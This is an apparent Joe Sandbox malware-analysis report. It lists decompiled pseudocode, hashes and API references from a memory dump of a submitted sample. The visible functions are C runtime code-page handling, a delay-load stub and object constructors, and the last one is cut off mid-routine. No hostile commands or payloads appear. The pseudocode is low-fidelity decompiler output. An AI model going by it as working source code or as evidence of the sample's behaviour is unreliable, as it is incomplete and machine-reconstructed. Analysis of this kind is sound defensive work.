Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 56bdd03943bcd42a3d91d829677b808c390ccb4d9a4a027b7d6508fca87dbdd1
Instruction ID: 65f6f3d232e9544513f49fadde8274d32892ac8ee3c77e178833ae0ea348ec06
Opcode Fuzzy Hash: 56bdd03943bcd42a3d91d829677b808c390ccb4d9a4a027b7d6508fca87dbdd1
Instruction Fuzzy Hash: C2D0122168166867851033D45C03EA9FAD4CA43FA1B0440D6FF0A65361FAA5851049D9

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD75C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBD75C() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00BBDDAF(_t3, _t4, _t8, _t9, _t10, 0xbdada4, 0xc0113c); // executed
				goto __eax;
			}

0x00bbd6f1
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Strings

t, xrefs: 00BBD75C

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: t
API String ID: 1269201914-2238339752
Opcode ID: cb03edf1850750b3f9e0ba930eb98dd568512cdce781701fcb82aa54ecfdfe4e
Instruction ID: 449b01c77d9c38be7494191de6f31a13b1dc577efa65ee15f2fe7263cc3f360b
Opcode Fuzzy Hash: cb03edf1850750b3f9e0ba930eb98dd568512cdce781701fcb82aa54ecfdfe4e
Instruction Fuzzy Hash: 2BB012D525E0016E318862145C02E7A42CDC4D0B11334C0FBB905C01A0F4CC0C004133

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB1D0 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00BCB1D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xbdd668; // 0xb57946a0
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00BCAD9B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xbdd828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xbdd828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xc006c4 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00BCAE0E(_t98);
												goto L37;
											}
										} else {
											E00BBF1A0(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00BCAD5D( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00BCAE73(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00BBF1A0(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xbdd838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xbdd820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00BCAD5D(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xbdd82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00BCAE0E(_t98);
				}
				L39:
				return E00BBEA8A(_v8 ^ _t99);
			}

0x00bcb1d8
0x00bcb1df
0x00bcb1e7
0x00bcb1ef
0x00bcb1f4
0x00bcb205
0x00bcb205
0x00bcb207
0x00bcb209
0x00bcb20b
0x00bcb20e
0x00bcb20e
0x00bcb214
0x00000000
0x00000000
0x00bcb21a
0x00bcb21b
0x00bcb21e
0x00bcb221
0x00bcb226
0x00000000
0x00bcb228
0x00bcb228
0x00bcb22e
0x00bcb2fc
0x00bcb234
0x00bcb234
0x00bcb23a
0x00000000
0x00bcb240
0x00bcb244
0x00bcb24a
0x00bcb24c
0x00000000
0x00bcb252
0x00bcb257
0x00bcb25d
0x00bcb25f
0x00bcb2e9
0x00bcb2ef
0x00000000
0x00bcb2f1
0x00bcb2f2
0x00000000
0x00bcb2f2
0x00bcb265
0x00bcb26f
0x00bcb274
0x00bcb27c
0x00bcb282
0x00bcb283
0x00bcb286
0x00bcb2d9
0x00bcb288
0x00bcb288
0x00bcb28c
0x00bcb28f
0x00bcb291
0x00bcb291
0x00bcb294
0x00bcb296
0x00000000
0x00000000
0x00bcb298
0x00bcb29b
0x00bcb2a6
0x00bcb2a6
0x00bcb2a8
0x00000000
0x00000000
0x00bcb2a0
0x00bcb2a5
0x00bcb2a5
0x00bcb2a5
0x00bcb2aa
0x00bcb2ad
0x00bcb2b0
0x00000000
0x00000000
0x00000000
0x00bcb2b0
0x00bcb291
0x00bcb2b2
0x00bcb2b2
0x00bcb2b5
0x00bcb2ba
0x00bcb2ba
0x00bcb2bd
0x00bcb2be
0x00bcb2be
0x00bcb2be
0x00bcb2ce
0x00bcb2d4
0x00bcb2d4
0x00bcb2de
0x00bcb2e1
0x00bcb2e2
0x00bcb2e3
0x00bcb3a7
0x00bcb3a8
0x00bcb3ad
0x00bcb3ae
0x00bcb3ae
0x00bcb25f
0x00bcb24c
0x00bcb23a
0x00bcb22e
0x00000000
0x00bcb3b0
0x00bcb30e
0x00bcb316
0x00bcb316
0x00bcb31a
0x00bcb31d
0x00bcb323
0x00bcb326
0x00bcb326
0x00bcb329
0x00bcb32b
0x00bcb32d
0x00bcb32d
0x00bcb330
0x00bcb332
0x00000000
0x00000000
0x00bcb334
0x00bcb337
0x00bcb353
0x00bcb353
0x00bcb355
0x00000000
0x00000000
0x00bcb33c
0x00bcb342
0x00bcb344
0x00bcb34a
0x00bcb34e
0x00bcb34e
0x00bcb34f
0x00000000
0x00bcb34f
0x00000000
0x00bcb342
0x00bcb357
0x00bcb35a
0x00bcb35d
0x00000000
0x00000000
0x00000000
0x00bcb35d
0x00bcb35f
0x00bcb35f
0x00bcb362
0x00bcb363
0x00bcb366
0x00bcb369
0x00bcb369
0x00bcb36f
0x00bcb372
0x00bcb381
0x00bcb38a
0x00bcb38f
0x00bcb395
0x00bcb396
0x00bcb396
0x00bcb399
0x00bcb39c
0x00bcb39f
0x00bcb3a2
0x00bcb3a2
0x00bcb3a2
0x00000000
0x00bcb1f6
0x00bcb1f7
0x00bcb1fd
0x00bcb3b1
0x00bcb3c0

APIs

Part of subcall function 00BCAD9B: GetOEMCP.KERNEL32(00000000,?,?,00BCB024,?), ref: 00BCADC6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BCB069,?,00000000), ref: 00BCB244
GetCPInfo.KERNEL32(00000000,00BCB069,?,?,?,00BCB069,?,00000000), ref: 00BCB257

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 23e53469a331a1f98be5c36621fe853a712c9bad3952fbfae77e321a6cb490ee
Instruction ID: 9ad60faee8530f311b79b17cda49f13e3a281c8292969da5f3a0291eec09db93
Opcode Fuzzy Hash: 23e53469a331a1f98be5c36621fe853a712c9bad3952fbfae77e321a6cb490ee
Instruction Fuzzy Hash: B351F170A002459EDB219F75C882FBEBFE5EF81310F1440EED4968B251D7359546CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BA13B6 Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00BA13B6(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00BBE0E4(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00BA95B6(_t78);
				 *_t89 = 0xbd25b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00BA6027(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00BAC767(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00BA1550();
				_t62 = E00BA1550();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00BBE0A0(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00BAAFBD(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00BBF1A0(_t87, _t89 + 0x2208, 0, 0x40);
				E00BBF1A0(_t87, _t89 + 0x2248, 0, 0x34);
				E00BBF1A0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00ba13b6
0x00ba13b6
0x00ba13b6
0x00ba13b6
0x00ba13b6
0x00ba13bb
0x00ba13bc
0x00ba13bf
0x00ba13c1
0x00ba13c4
0x00ba13cb
0x00ba13d7
0x00ba13da
0x00ba13e5
0x00ba13e9
0x00ba13f4
0x00ba13fa
0x00ba1400
0x00ba140b
0x00ba1413
0x00ba1417
0x00ba141a
0x00ba1420
0x00ba1426
0x00ba1428
0x00ba144d
0x00ba142a
0x00ba142f
0x00ba1435
0x00ba1438
0x00ba143e
0x00ba1449
0x00ba1440
0x00ba1442
0x00ba1442
0x00ba143e
0x00ba1450
0x00ba145c
0x00ba1463
0x00ba146a
0x00ba1473
0x00ba147e
0x00ba1488
0x00ba148e
0x00ba1494
0x00ba149a
0x00ba14a0
0x00ba14a6
0x00ba14ac
0x00ba14b3
0x00ba14b9
0x00ba14bf
0x00ba14c5
0x00ba14cb
0x00ba14d1
0x00ba14e0
0x00ba14ef
0x00ba14fa
0x00ba1502
0x00ba1508
0x00ba150e
0x00ba1514
0x00ba151a
0x00ba1520
0x00ba1526
0x00ba152f
0x00ba1535
0x00ba153b
0x00ba1543
0x00ba154d

APIs

__EH_prolog.LIBCMT ref: 00BA13B6

Part of subcall function 00BA6027: __EH_prolog.LIBCMT ref: 00BA602C

Part of subcall function 00BAC767: __EH_prolog.LIBCMT ref: 00BAC76C
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7AF
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7D3

new.LIBCMT ref: 00BA142F

Part of subcall function 00BAAFBD: __EH_prolog.LIBCMT ref: 00BAAFC2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a03c0af2017d4163db403773741d9ca3cbcb07d9be105e4b4bc52d70b02eb4ef
Instruction ID: 5824557be3124eac79c6947f0e153aab43fe0835b596053e94208879668d87ea
Opcode Fuzzy Hash: a03c0af2017d4163db403773741d9ca3cbcb07d9be105e4b4bc52d70b02eb4ef
Instruction Fuzzy Hash: 994138B0809B40DED724DF7988859E6FBE5FF29310F40496ED5EE83282DB726554CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BA13B1 Relevance: 3.1, APIs: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA13B1(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00BBE0E4(E00BD1AE7, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00BA95B6(_t78);
				 *_t89 = 0xbd25b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00BA6027(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00BAC767(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00BA1550();
				_t62 = E00BA1550();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00BBE0A0(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00BAAFBD(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00BBF1A0(_t87, _t89 + 0x2208, 0, 0x40);
				E00BBF1A0(_t87, _t89 + 0x2248, 0, 0x34);
				E00BBF1A0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00ba13b1
0x00ba13b1
0x00ba13b1
0x00ba13b1
0x00ba13b6
0x00ba13bf
0x00ba13c1
0x00ba13c4
0x00ba13cb
0x00ba13d7
0x00ba13da
0x00ba13e5
0x00ba13e9
0x00ba13f4
0x00ba13fa
0x00ba1400
0x00ba140b
0x00ba1413
0x00ba1417
0x00ba141a
0x00ba1420
0x00ba1426
0x00ba1428
0x00ba144d
0x00ba142a
0x00ba142f
0x00ba1435
0x00ba1438
0x00ba143e
0x00ba1449
0x00ba1440
0x00ba1442
0x00ba1442
0x00ba143e
0x00ba1450
0x00ba145c
0x00ba1463
0x00ba146a
0x00ba1473
0x00ba147e
0x00ba1488
0x00ba148e
0x00ba1494
0x00ba149a
0x00ba14a0
0x00ba14a6
0x00ba14ac
0x00ba14b3
0x00ba14b9
0x00ba14bf
0x00ba14c5
0x00ba14cb
0x00ba14d1
0x00ba14e0
0x00ba14ef
0x00ba14fa
0x00ba1502
0x00ba1508
0x00ba150e
0x00ba1514
0x00ba151a
0x00ba1520
0x00ba1526
0x00ba152f
0x00ba1535
0x00ba153b
0x00ba1543
0x00ba154d

APIs

__EH_prolog.LIBCMT ref: 00BA13B6

Part of subcall function 00BA6027: __EH_prolog.LIBCMT ref: 00BA602C

Part of subcall function 00BAC767: __EH_prolog.LIBCMT ref: 00BAC76C
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7AF
Part of subcall function 00BAC767: new.LIBCMT ref: 00BAC7D3

new.LIBCMT ref: 00BA142F

Part of subcall function 00BAAFBD: __EH_prolog.LIBCMT ref: 00BAAFC2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9f0147d3096b7bba8031694160086d5659a228958283393f48df30271bc96abe
Instruction ID: da2fe6c84c75a8e59e291e3f1e2a96351607c154cbc9692a067ff2b7c4a53d5a
Opcode Fuzzy Hash: 9f0147d3096b7bba8031694160086d5659a228958283393f48df30271bc96abe
Instruction Fuzzy Hash: FB4127B0805B40DEE724DF7988859E7FAE5FF29310F4049AED1EE83282DB726554CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB007 Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00BCB007(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00BC8E25(__ebx, __ecx, __edx);
				E00BCB12E(__ebx, __ecx, __edx, _t81);
				_t31 = E00BCAD9B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00BC8398(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00BCB1D0(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00BC814F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
